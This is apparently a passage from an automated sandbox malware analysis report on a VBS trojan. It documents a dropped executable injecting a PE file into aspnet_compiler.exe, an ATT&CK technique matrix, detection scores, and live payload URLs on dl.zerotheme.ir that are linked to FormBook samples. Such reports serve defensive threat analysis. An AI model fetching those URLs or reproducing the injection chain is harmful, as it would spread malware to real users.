Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013CCA72 mov eax, dword ptr fs:[00000030h]	4_2_013CCA72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0138CA6F mov eax, dword ptr fs:[00000030h]	4_2_0138CA6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0138CA6F mov eax, dword ptr fs:[00000030h]	4_2_0138CA6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0138CA6F mov eax, dword ptr fs:[00000030h]	4_2_0138CA6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01356A50 mov eax, dword ptr fs:[00000030h]	4_2_01356A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01356A50 mov eax, dword ptr fs:[00000030h]	4_2_01356A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01356A50 mov eax, dword ptr fs:[00000030h]	4_2_01356A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01356A50 mov eax, dword ptr fs:[00000030h]	4_2_01356A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01356A50 mov eax, dword ptr fs:[00000030h]	4_2_01356A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01356A50 mov eax, dword ptr fs:[00000030h]	4_2_01356A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01356A50 mov eax, dword ptr fs:[00000030h]	4_2_01356A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01360A5B mov eax, dword ptr fs:[00000030h]	4_2_01360A5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01360A5B mov eax, dword ptr fs:[00000030h]	4_2_01360A5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01358AA0 mov eax, dword ptr fs:[00000030h]	4_2_01358AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01358AA0 mov eax, dword ptr fs:[00000030h]	4_2_01358AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013A6AA4 mov eax, dword ptr fs:[00000030h]	4_2_013A6AA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01388A90 mov edx, dword ptr fs:[00000030h]	4_2_01388A90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0135EA80 mov eax, dword ptr fs:[00000030h]	4_2_0135EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0135EA80 mov eax, dword ptr fs:[00000030h]	4_2_0135EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0135EA80 mov eax, dword ptr fs:[00000030h]	4_2_0135EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0135EA80 mov eax, dword ptr fs:[00000030h]	4_2_0135EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0135EA80 mov eax, dword ptr fs:[00000030h]	4_2_0135EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0135EA80 mov eax, dword ptr fs:[00000030h]	4_2_0135EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0135EA80 mov eax, dword ptr fs:[00000030h]	4_2_0135EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0135EA80 mov eax, dword ptr fs:[00000030h]	4_2_0135EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0135EA80 mov eax, dword ptr fs:[00000030h]	4_2_0135EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01424A80 mov eax, dword ptr fs:[00000030h]	4_2_01424A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0138AAEE mov eax, dword ptr fs:[00000030h]	4_2_0138AAEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0138AAEE mov eax, dword ptr fs:[00000030h]	4_2_0138AAEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01350AD0 mov eax, dword ptr fs:[00000030h]	4_2_01350AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01384AD0 mov eax, dword ptr fs:[00000030h]	4_2_01384AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01384AD0 mov eax, dword ptr fs:[00000030h]	4_2_01384AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013A6ACC mov eax, dword ptr fs:[00000030h]	4_2_013A6ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013A6ACC mov eax, dword ptr fs:[00000030h]	4_2_013A6ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013A6ACC mov eax, dword ptr fs:[00000030h]	4_2_013A6ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013D8D20 mov eax, dword ptr fs:[00000030h]	4_2_013D8D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01346D10 mov eax, dword ptr fs:[00000030h]	4_2_01346D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01346D10 mov eax, dword ptr fs:[00000030h]	4_2_01346D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01346D10 mov eax, dword ptr fs:[00000030h]	4_2_01346D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01384D1D mov eax, dword ptr fs:[00000030h]	4_2_01384D1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0136AD00 mov eax, dword ptr fs:[00000030h]	4_2_0136AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0136AD00 mov eax, dword ptr fs:[00000030h]	4_2_0136AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0136AD00 mov eax, dword ptr fs:[00000030h]	4_2_0136AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01408D10 mov eax, dword ptr fs:[00000030h]	4_2_01408D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01408D10 mov eax, dword ptr fs:[00000030h]	4_2_01408D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013E8D6B mov eax, dword ptr fs:[00000030h]	4_2_013E8D6B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01358D59 mov eax, dword ptr fs:[00000030h]	4_2_01358D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01358D59 mov eax, dword ptr fs:[00000030h]	4_2_01358D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01358D59 mov eax, dword ptr fs:[00000030h]	4_2_01358D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01358D59 mov eax, dword ptr fs:[00000030h]	4_2_01358D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01358D59 mov eax, dword ptr fs:[00000030h]	4_2_01358D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01350D59 mov eax, dword ptr fs:[00000030h]	4_2_01350D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01350D59 mov eax, dword ptr fs:[00000030h]	4_2_01350D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01350D59 mov eax, dword ptr fs:[00000030h]	4_2_01350D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01378DBF mov eax, dword ptr fs:[00000030h]	4_2_01378DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01378DBF mov eax, dword ptr fs:[00000030h]	4_2_01378DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0138CDB1 mov ecx, dword ptr fs:[00000030h]	4_2_0138CDB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0138CDB1 mov eax, dword ptr fs:[00000030h]	4_2_0138CDB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0138CDB1 mov eax, dword ptr fs:[00000030h]	4_2_0138CDB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01386DA0 mov eax, dword ptr fs:[00000030h]	4_2_01386DA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01346DF6 mov eax, dword ptr fs:[00000030h]	4_2_01346DF6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0137CDF0 mov eax, dword ptr fs:[00000030h]	4_2_0137CDF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0137CDF0 mov ecx, dword ptr fs:[00000030h]	4_2_0137CDF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0135ADE0 mov eax, dword ptr fs:[00000030h]	4_2_0135ADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0135ADE0 mov eax, dword ptr fs:[00000030h]	4_2_0135ADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0135ADE0 mov eax, dword ptr fs:[00000030h]	4_2_0135ADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0135ADE0 mov eax, dword ptr fs:[00000030h]	4_2_0135ADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0135ADE0 mov eax, dword ptr fs:[00000030h]	4_2_0135ADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0135ADE0 mov eax, dword ptr fs:[00000030h]	4_2_0135ADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01370DE1 mov eax, dword ptr fs:[00000030h]	4_2_01370DE1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0134CDEA mov eax, dword ptr fs:[00000030h]	4_2_0134CDEA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0134CDEA mov eax, dword ptr fs:[00000030h]	4_2_0134CDEA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0137EDD3 mov eax, dword ptr fs:[00000030h]	4_2_0137EDD3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0137EDD3 mov eax, dword ptr fs:[00000030h]	4_2_0137EDD3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013D4DD7 mov eax, dword ptr fs:[00000030h]	4_2_013D4DD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013D4DD7 mov eax, dword ptr fs:[00000030h]	4_2_013D4DD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01418DAE mov eax, dword ptr fs:[00000030h]	4_2_01418DAE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01418DAE mov eax, dword ptr fs:[00000030h]	4_2_01418DAE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01424DAD mov eax, dword ptr fs:[00000030h]	4_2_01424DAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_0134EC20 mov eax, dword ptr fs:[00000030h]	4_2_0134EC20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013ECC20 mov eax, dword ptr fs:[00000030h]	4_2_013ECC20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013ECC20 mov eax, dword ptr fs:[00000030h]	4_2_013ECC20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_013D4C0F mov eax, dword ptr fs:[00000030h]	4_2_013D4C0F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01360C00 mov eax, dword ptr fs:[00000030h]	4_2_01360C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 4_2_01360C00 mov eax, dword ptr fs:[00000030h]	4_2_01360C00

Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe

Memory allocated: page read and write | page guard

Benign windows process drops PE files

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\wscript.exe

File created: temp_exec.exe.0.dr

Jump to dropped file

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 protect: page execute and read and write

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 9D0008	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\temp_exec.exe "C:\Users\user\AppData\Local\Temp\temp_exec.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"	Jump to behavior

Source: temp_exec.exe, 00000002.00000002.2093264557.0000000002EE3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Progmant-jq
Source: temp_exec.exe, 00000002.00000002.2093264557.0000000002EE3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: temp_exec.exe, 00000002.00000002.2093264557.0000000002EE3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWndt-jq
Source: temp_exec.exe, 00000002.00000002.2093264557.0000000002EE3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Progman

Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe

Queries volume information: C:\Users\user\AppData\Local\Temp\temp_exec.exe VolumeInformation

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match	File source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2136321349.0000000000E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2136079152.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match	File source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2136321349.0000000000E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2136079152.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	221 Scripting	Valid Accounts	1 Exploitation for Client Execution	221 Scripting	312 Process Injection	1 Disable or Modify Tools	OS Credential Dumping	221 Security Software Discovery	Remote Services	11 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	41 Virtualization/Sandbox Evasion	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	312 Process Injection	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Deobfuscate/Decode Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	3 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	4 Obfuscated Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	12 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
QT2Q1292300924.vbs	16%	Virustotal		Browse
QT2Q1292300924.vbs	11%	ReversingLabs	Script-WScript.Trojan.Sonbokli

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\temp_exec.exe	100%	Avira	HEUR/AGEN.1337357
C:\Users\user\AppData\Local\Temp\temp_exec.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\temp_exec.exe	21%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
bg.microsoft.map.fastly.net	0%	Virustotal	Browse
dl.zerotheme.ir	10%	Virustotal	Browse
fp2e7a.wpc.phicdn.net	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://dl.zerotheme.ir/kokorila/cgl-bin/bina.exe	10%	Virustotal		Browse
http://dl.zerotheme.ir	10%	Virustotal		Browse
https://dl.zerotheme.ir/kokorila/cgl-bin/DLLL.dll	1%	Virustotal		Browse
https://dl.zerotheme.ir	0%	Virustotal		Browse
https://dl.zerotheme.ir/kokorila/cgl-bin/bina.exebhttps://dl.zerotheme.ir/kokorila/cgl-bin/DLLL.dll	9%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
bg.microsoft.map.fastly.net	199.232.210.172	true	false	0%, Virustotal, Browse	unknown
dl.zerotheme.ir	185.18.213.20	true	false	10%, Virustotal, Browse	unknown
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://dl.zerotheme.ir/kokorila/cgl-bin/bina.exe	true	10%, Virustotal, Browse	unknown
https://dl.zerotheme.ir/kokorila/cgl-bin/DLLL.dll	true	1%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://dl.zerotheme.ir	temp_exec.exe, 00000002.00000002.2093264557.0000000002FAC000.00000004.00000800.00020000.00000000.sdmp, temp_exec.exe, 00000002.00000002.2093264557.0000000002F9B000.00000004.00000800.00020000.00000000.sdmp, temp_exec.exe, 00000002.00000002.2093264557.0000000002FF5000.00000004.00000800.00020000.00000000.sdmp	true	0%, Virustotal, Browse	unknown
http://dl.zerotheme.ird	temp_exec.exe, 00000002.00000002.2093264557.0000000002FB2000.00000004.00000800.00020000.00000000.sdmp	true		unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	temp_exec.exe, 00000002.00000002.2093264557.0000000002F9B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://dl.zerotheme.ir	temp_exec.exe, 00000002.00000002.2093264557.0000000002FB2000.00000004.00000800.00020000.00000000.sdmp	true	10%, Virustotal, Browse	unknown
https://dl.zerotheme.ir/kokorila/cgl-bin/bina.exebhttps://dl.zerotheme.ir/kokorila/cgl-bin/DLLL.dll	temp_exec.exe, 00000002.00000002.2093264557.0000000002ECD000.00000004.00000800.00020000.00000000.sdmp, temp_exec.exe, 00000002.00000002.2093264557.0000000002EE3000.00000004.00000800.00020000.00000000.sdmp	true	9%, Virustotal, Browse	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.18.213.20	dl.zerotheme.ir	Iran (ISLAMIC Republic Of)		44285	SEFROYEKPARDAZENG-ASAS42043-BertinaTechnologyCompanyIR	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1522524
Start date and time:	2024-09-30 10:02:34 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 41s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	QT2Q1292300924.vbs
Detection:	MAL
Classification:	mal100.troj.evad.winVBS@7/2@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 52 Number of non-executed functions: 269
Cookbook Comments:	Found application associated with file extension: .vbs Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): dllhost.exe
Excluded IPs from analysis (whitelisted): 20.114.59.183
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ocsp.edge.digicert.com, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
04:03:28	API Interceptor	16x Sleep call for process: temp_exec.exe modified
04:03:32	API Interceptor	3x Sleep call for process: aspnet_compiler.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.18.213.20	eMJ2QgQF4u.rtf	Get hash	malicious	FormBook	Browse
185.18.213.20	QT2Q1292.xla.xlsx	Get hash	malicious	FormBook	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
dl.zerotheme.ir	eMJ2QgQF4u.rtf	Get hash	malicious	FormBook	Browse	185.18.213.20
dl.zerotheme.ir	QT2Q1292.xla.xlsx	Get hash	malicious	FormBook	Browse	185.18.213.20
bg.microsoft.map.fastly.net	Urgent Quotation Notification_pdf.vbs	Get hash	malicious	Unknown	Browse	199.232.214.172
	http://hrlaw.com.au	Get hash	malicious	Unknown	Browse	199.232.214.172
	https://url.uk.m.mimecastprotect.com/s/r06pCLv4mSmE7ORSBfNCyUvN-?domain=clicktracking.yellowbook.com/	Get hash	malicious	Unknown	Browse	199.232.214.172
	https://www.google.ad/amp/clck.ru/3DSSA9?hghgHGHGHJGhghdgddghfhghfgdgdgdgfhgg?sdfsewsrewrettfg	Get hash	malicious	Unknown	Browse	199.232.214.172
	yVhGfho0R4.exe	Get hash	malicious	Remcos	Browse	199.232.214.172
	https://pokerfanboy.com/	Get hash	malicious	Unknown	Browse	199.232.210.172
	https://polap77.com/	Get hash	malicious	HTMLPhisher	Browse	199.232.214.172
	https://pokegamaclub.com/	Get hash	malicious	Unknown	Browse	199.232.214.172
	Transmission Cost Database 2.0.xlsb	Get hash	malicious	Unknown	Browse	199.232.214.172
	https://okfun188.com/	Get hash	malicious	Unknown	Browse	199.232.214.172
fp2e7a.wpc.phicdn.net	http://hrlaw.com.au	Get hash	malicious	Unknown	Browse	192.229.221.95
	Advisory23-UCDMS04-11-01.pdf.lnk	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://url.uk.m.mimecastprotect.com/s/r06pCLv4mSmE7ORSBfNCyUvN-?domain=clicktracking.yellowbook.com/	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://wwvmicrosx.live/office365/office_cookies/main	Get hash	malicious	HTMLPhisher	Browse	192.229.221.95
	https://www.google.ad/amp/clck.ru/3DSSA9?hghgHGHGHJGhghdgddghfhghfgdgdgdgfhgg?sdfsewsrewrettfg	Get hash	malicious	Unknown	Browse	192.229.221.95
	http://jeevankiranfoundationcenter.co.in/css/rrp.htm	Get hash	malicious	Kutaki	Browse	192.229.221.95
	yVhGfho0R4.exe	Get hash	malicious	Remcos	Browse	192.229.221.95
	https://polidos.com/	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://pokerfanboy.com/	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://polap77.com/	Get hash	malicious	HTMLPhisher	Browse	192.229.221.95

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SEFROYEKPARDAZENG-ASAS42043-BertinaTechnologyCompanyIR	eMJ2QgQF4u.rtf	Get hash	malicious	FormBook	Browse	185.18.213.20
	QT2Q1292.xla.xlsx	Get hash	malicious	FormBook	Browse	185.18.213.20
	https://monogogo.info/JQJMLAWN#em=npaladino@bigge.com	Get hash	malicious	Phisher	Browse	45.140.247.113
	qD7cj0t7Ag.elf	Get hash	malicious	Mirai, Moobot	Browse	45.140.242.232
	mDjOa15q8T.elf	Get hash	malicious	Mirai	Browse	45.140.241.81
	NiAsQEhh9p.elf	Get hash	malicious	Mirai	Browse	45.156.181.90
	enEQvjUlGl.elf	Get hash	malicious	Mirai	Browse	45.140.241.74
	InLf78j8qW.elf	Get hash	malicious	Mirai	Browse	45.140.242.215
	4KXNneQz0d.elf	Get hash	malicious	Unknown	Browse	185.182.248.108
